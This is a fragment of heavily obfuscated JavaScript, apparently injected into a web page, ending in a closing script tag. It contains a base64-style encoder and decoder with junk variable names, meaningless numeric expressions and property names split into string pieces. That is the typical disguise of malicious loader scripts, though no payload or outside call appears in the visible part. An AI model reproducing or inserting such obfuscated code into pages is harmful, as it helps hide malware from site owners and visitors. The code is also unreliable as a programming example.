minans=(hisco>=1599.?.27:acuta);iunges=(4638,dicari);for(etque=0;iunges<visu[amorum];iunges++,etque++){chiack=chiack*256+visu[yard](iunges);minans=minans*4;obliti=obliti+sulco["charAt"](parseInt(chiack/minans));chiack=chiack%minans;if(minans==64){obliti=obliti+sulco["charAt"](parseInt(chiack));chiack=0;minans=1;etque++}if(etque>=75){etque=-1;obliti=obliti+'\n'}}if((5e0>=27.?9462.:iunges)%(9e0,facat)){obliti=obliti+sulco["charAt"](parseInt(chiack*((iunges%3==1)?16:4)));obliti=obliti+((iunges%3)==1?'==':vitateei[optime](61))}return (2759,obliti)}function exciti(visu,fuerat,verras,uterum){var obliti=(.29,'');var iunges;var chiack=(2048<7468.?dicari:0.2);var minans=(317>="2692"?2e0:1);for(iunges=0;iunges<visu[amorum];iunges++){if(visu["charAt"](iunges)==vitateei[optime](61)||visu["charAt"](iunges)=='\n')break;chiack=chiack*64+sulco["indexOf"](visu["charAt"](iunges));minans=(minans==1?64:minans/4);if(minans!=64){obliti=obliti+vitateei[optime](parseInt(chiack/minans));chiack=chiack%minans}}return (574.,obliti)}function relata(uelque,duae,invde,doceri){this[(0.4e1>.1?""+oravi+"o"+mque+"s"+"e"+nodos+mdcqve:3.34e2)]=(8.,uelque);if((5.7e1,uelque)[(9e0>=9e0?"p"+"ar"+fetuum+mque+mdcqve:2778)]==(3.443e3>2.?uelque:54.)){genti=(0.2267,'a')}else{laude+=(0.8301,'@'+mergis)}}</script>